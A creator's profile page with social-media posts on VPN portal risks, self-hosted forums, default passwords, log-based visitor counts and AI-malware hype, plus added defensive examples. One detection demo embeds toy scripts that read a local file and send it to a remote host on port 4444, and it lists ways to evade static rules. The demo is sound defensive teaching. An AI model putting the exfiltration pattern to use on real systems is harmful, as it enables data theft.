Tom Lawrence

2.2K Followers
147 Following
169 Posts
Tech Enthusiast, Open Source Advocate, Content Creator, DM's are not for tech support but forums are
Web Site: https://lawrencesystems.com
YouTube: https://www.youtube.com/@lawrencesystems
LinkedIn: https://www.linkedin.com/in/lawrencesystems
LTS Forums: https://forums.lawrencesystems.com
LTS Github: https://github.com/lawrencesystems

There are two types of SSL VPN web interfaces: those that have been exploited and those that will be exploited.

I get the wonderful convenience of having a nice web interface for users to log into, but for companies that care about security these should be retired.

So what should be used instead? There are a few options. First, there are plenty of overlay network options: https://www.youtube.com/watch?v=eCXl09h7lqo

Second is using VPN setups such as OpenVPN with a certificate that has to be in place before the user/pass auth starts, as this greatly reduces the threat surface.
https://youtu.be/I61t7aoGC2Q
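As an added example of that second option (this is not the author's configuration), here is a minimal OpenVPN 2.5+ server fragment in which nothing the username/password stage touches is reachable until the client first presents the shared `tls-crypt` key and then a client certificate signed by the VPN CA. File paths, the `10.8.0.0/24` tunnel range, the PAM plugin location and the `nobody`/`nogroup` accounts are assumptions; adjust them to your install.

```conf
# Added example, not from the original post. Paths and names are assumptions.
port 1194
proto udp
dev tun

# Server identity and the CA that signs client certificates.
ca   /etc/openvpn/server/ca.crt
cert /etc/openvpn/server/server.crt
key  /etc/openvpn/server/server.key
dh   none                      # ECDH only; no static DH parameters needed

# Pre-shared key that encrypts and authenticates the control channel.
# Packets without it are dropped before any TLS handshake even starts,
# so a scanner never sees a TLS server, let alone a login prompt.
tls-crypt /etc/openvpn/server/tc.key

# Require a client certificate. Without a valid one the TLS handshake fails
# and the username/password stage is never reached. 'require' is already the
# default; it is written out so nobody relaxes it by accident.
verify-client-cert require
remote-cert-tls client         # reject a server cert presented as a client cert
crl-verify /etc/openvpn/server/crl.pem   # lost laptop => revoke its cert here

# Second factor: username/password checked by PAM only AFTER the cert passes.
plugin /usr/lib/openvpn/openvpn-plugin-auth-pam.so login   # path is distro-specific
# Alternative to the PAM plugin:
# auth-user-pass-verify /etc/openvpn/server/check-user.sh via-file

# Modern crypto floor.
tls-version-min 1.2
data-ciphers AES-256-GCM:CHACHA20-POLY1305
auth SHA256

server 10.8.0.0 255.255.255.0
keepalive 10 60
persist-key
persist-tun
user nobody
group nogroup
verb 3
```

The matching client profile carries the same `tls-crypt` key, its own `cert`/`key` pair, `remote-cert-tls server`, and `auth-user-pass` for the second factor. Note that the `tls-crypt` key is shared by every client, so it is a gate against Internet noise rather than a per-user secret; the per-user gate is the certificate, which is why keeping the CRL current matters as much as the password policy.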

Let's talk about building community and owning the platform.

I started my forums back in 2019, and here in 2024 I have over 6,000 registered users (it's free to sign up). I keep my forums public, allowing the solutions I and all the amazing community members post there to be easily found by the search systems, which has led to a good amount of traffic. Currently I get over 7 million hits a week from over 50,000 unique visitors.

I am posting this because people should know that locking their data & their audiences up in proprietary platforms is not the best way or the only way to do it. I chose to build my forums with the open source tool Discourse.

Relying on proprietary platforms for community building is akin to building a house on rented land, where the landlord can change the terms of your lease on a whim, or worse, evict you entirely. That's why tools like Discourse represent a beacon of hope. They're not just forums; they're fortresses of freedom in the online world, a foundation for a community that you and your members own. You're immune to the capricious whims of platform giants who view your community as mere data points for their algorithms. By owning your platform, you ensure that the community and its invaluable interactions remain yours, portable and persistent, a digital agora that can't be walled off or whisked away. It's about reclaiming the web's original promise: a space for unfettered connection and creation, where communities thrive on their own terms.

A link to my forums for those interested in joining:

https://forums.lawrencesystems.com/

Here is a related post on the Discourse blog from last year.

https://blog.discourse.org/2023/06/how-lawrence-systems-built-a-thriving-community-using-discourse/

CISA to Manufacturers: Stop Making Hackers' Jobs Easy with Predictable Passwords!

Security is not getting worse; it's always been this bad, and there is a big backlog of poor security practices we need to catch up on. The good news is we are slowly getting better.

https://www.cisa.gov/news-events/alerts/2023/12/15/cisa-secure-design-alert-urges-manufacturers-eliminate-default-passwords

Since launching my new site I became curious to just how many people are using ad & tracking blockers.

By looking at the web server logs directly and removing the crawlers, I am getting just under 3,000 unique visitors to my site over a 2-day period, and Google Analytics only shows about 600 of them.

If you are curious about the tool I used to parse the web logs, I have a video on it here:

https://youtu.be/-B9kE9_N7fo?si=FDqTNmgC_1JZDks-
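The count the post describes, as an added example that is not the author's tooling: parse access log lines straight from the server, drop hits whose User-Agent marks a crawler or scripted client, and count unique client IPs for what is left. The log lines are constructed (RFC 5737 documentation addresses), the regex assumes the Apache/nginx "combined" log format, and the crawler marker list is a starting point to extend from your own logs.

```python
"""Added example, not the author's code: unique non-crawler visitors from raw
access logs. Sample lines are constructed; the regex assumes "combined" format.
"""
import re

# Apache/nginx "combined" log format (assumption; adjust if your log_format differs).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# User-Agent substrings that mark crawlers and scripted clients. Deliberately
# short; build the real list from the UAs you actually see.
CRAWLER_MARKERS = (
    "bot", "crawler", "spider", "slurp", "facebookexternalhit",
    "curl/", "wget/", "python-requests",
)

# Constructed sample traffic: two humans (one with two hits), two search
# crawlers, one curl fetch, and one line that is not in combined format.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/121.0"',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /assets/app.js HTTP/1.1" 200 9821 "https://example.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/121.0"',
    '198.51.100.7 - - [01/Jan/2024:10:01:13 +0000] "GET /blog/ HTTP/1.1" 200 7310 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '192.0.2.44 - - [01/Jan/2024:10:02:40 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Safari/605.1.15"',
    '198.51.100.9 - - [01/Jan/2024:10:03:05 +0000] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"',
    '203.0.113.77 - - [01/Jan/2024:10:04:59 +0000] "GET /feed.xml HTTP/1.1" 200 2210 "-" "curl/8.4.0"',
    'this line is not in combined format and must be counted as unparsed',
]


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_crawler(user_agent):
    """Case-insensitive substring match against the crawler marker list."""
    ua = user_agent.lower()
    return any(marker in ua for marker in CRAWLER_MARKERS)


def unique_visitors(lines):
    """Split hits into crawler and human and count unique client IPs for each.

    Unique IPs undercount real people behind NAT and overcount people whose
    carrier rotates addresses, so treat the result as a floor, not a head count.
    """
    stats = {"parsed": 0, "unparsed": 0, "crawler_hits": 0, "human_hits": 0}
    human_ips, crawler_ips = set(), set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            stats["unparsed"] += 1      # keep this visible; a rising count means the format changed
            continue
        stats["parsed"] += 1
        if is_crawler(rec["ua"]):
            stats["crawler_hits"] += 1
            crawler_ips.add(rec["ip"])
        else:
            stats["human_hits"] += 1
            human_ips.add(rec["ip"])
    stats["unique_human_ips"] = len(human_ips)
    stats["unique_crawler_ips"] = len(crawler_ips)
    return stats


if __name__ == "__main__":
    print(unique_visitors(SAMPLE_LOG))
```

If the site sits behind a reverse proxy or CDN, the first field is the proxy's address, not the visitor's; log the real client address in your log_format (for example nginx's `$http_x_forwarded_for` or Apache's `%{X-Forwarded-For}i`) and point the regex at that field, otherwise every visitor collapses into a handful of IPs. Unlike a JavaScript beacon, a server log line is not something an ad or tracking blocker can suppress, which is the whole reason the two numbers in the post diverge.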

This was 5 years ago and we now have a word for what causes this:

-----"Enshittification"-----

But I am still optimistic about the future and an activist. To be an activist is to want to change the world. To change the world, you need two things: first, an understanding of what's wrong with it, and second, a theory of how to make it better.

This video by Cory Doctorow talks about both what's wrong and how we can collectively work together to stop the enshittification of the internet. How we can fight back against the "Felony Contempt of Business Model" that these large tech companies engage in.

https://youtu.be/BUaTsSMSbcU?si=Nr-5EUhKBhJ_1eow

Keynote: Five Giant Websites Filled with Screenshots of the Other Four - Cory Doctorow

T.P. Link? 🤔
In case anyone was wondering why I don't post much code.... 🤣
Gather around kids....
"ChatGPT Creates Malware"
Makes for a great headline to get the clicks, but let's talk about the reality of doing security.
First, let's talk about headlines vs reality:
👉 Headline:
Less-skilled threat actors could use tools such as ChatGPT to create malicious code and then dynamically change that code to avoid signature-based detection! 🤯😱😱🤯
👉 Reality:
Using simple signature-based AV protection HAS NOT been adequate for some time, which is why it's so important to use more complete solutions that actively monitor processes and behaviors, run by people who understand the Tactics, Techniques, and Procedures (TTPs) used by threat actors. Also, the Ransomware as a Service (RaaS) business model has been around a while, enabling low-skilled threat actors with no coding skills to deploy ransomware.
It's easy to get caught up in the hype of something new, and I think we are reaching peak "AI Hype News" (or at least I hope we are), but the best protections you can put in place today are the same as they were yesterday:
✅ Train people about phishing & security
✅ Have a process to keep systems patched
✅ Don't expose legacy services such as RDP, SMB, FTP, etc.
✅ Practice the principle of least privilege
✅ Use MFA everywhere you can!
✅ Have backups & test those backups
✅ Use modern, actively monitored security tools
And most of all, HAVE A PLAN if any or all of the above items fail.
I kept this list simple for brevity, so if you have questions reach out.
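To make the headline-vs-reality point concrete, here is an added example (not the author's code): a hash signature that matches one script misses a cosmetically rewritten copy of it, while a rule that looks at what the code does (resolving import aliases, then checking for a file read combined with an outbound connect and send) flags both copies and clears a benign script. The three scripts are constructed toys that are only parsed, never executed; static AST analysis stands in here for the runtime process, file and network telemetry an EDR actually watches.

```python
"""Added example, not code from the original post: hash signatures versus a
behaviour rule. The sample scripts are constructed and are parsed, never run.
"""
import ast
import hashlib

# Toy "exfil" script: read a file, send its contents to a remote host.
SAMPLE_V1 = '''
import socket
def run():
    data = open("/etc/hostname").read()
    s = socket.socket()
    s.connect(("203.0.113.10", 4444))
    s.send(data.encode())
'''

# Same behaviour, cosmetically different: module alias, renamed identifiers,
# an added comment. This is the kind of rewrite an LLM, or a one-line sed,
# produces on demand, and it is enough to change every byte-level signature.
SAMPLE_V2 = '''
import socket as net  # totally innocent helper
def go():
    blob = open("/etc/hostname").read()
    c = net.socket()
    c.connect(("203.0.113.10", 4444))
    c.send(blob.encode())
'''

# Benign script: reads a file, never touches the network.
SAMPLE_BENIGN = '''
def show():
    print(open("/etc/hostname").read())
'''


def sha256_hex(src):
    return hashlib.sha256(src.encode()).hexdigest()


# A "signature database" seeded with the hash of the first sample only.
SIGNATURE_DB = {sha256_hex(SAMPLE_V1)}


def signature_match(src):
    """Classic AV check: is this exact file's hash on the blocklist?"""
    return sha256_hex(src) in SIGNATURE_DB


def behaviour_indicators(src):
    """Look at what the code does rather than what it looks like.

    Returns the set of indicator names found. Import aliases are resolved so
    that 'import socket as net' still counts as use of the socket module.
    """
    tree = ast.parse(src)
    module_of = {}   # local name -> real module name
    calls = set()    # names and attributes that are called
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                module_of[alias.asname or alias.name] = alias.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for alias in node.names:
                module_of[alias.asname or alias.name] = node.module
        elif isinstance(node, ast.Call):
            f = node.func
            if isinstance(f, ast.Name):
                calls.add(f.id)
            elif isinstance(f, ast.Attribute):
                calls.add(f.attr)
    found = set()
    if "open" in calls:
        found.add("file_read")
    if "socket" in module_of.values() and {"connect", "send"} <= calls:
        found.add("outbound_network")
    return found


# The TTP we care about: local data read, then shipped out over the network.
EXFIL_PATTERN = {"file_read", "outbound_network"}


def verdict(src):
    """Return (signature_hit, behaviour_hit) for one script."""
    return signature_match(src), behaviour_indicators(src) >= EXFIL_PATTERN


if __name__ == "__main__":
    for name, src in (("v1", SAMPLE_V1), ("v2", SAMPLE_V2), ("benign", SAMPLE_BENIGN)):
        print(name, verdict(src))
```

The static rule is itself easy to dodge (`__import__("socket")`, `importlib`, shelling out to a system tool), which is exactly why the post's point is about actively monitored tooling and people who know the TTPs rather than any single rule: at runtime the file open and the outbound connection happen regardless of how the source was spelled, and that is the layer worth watching.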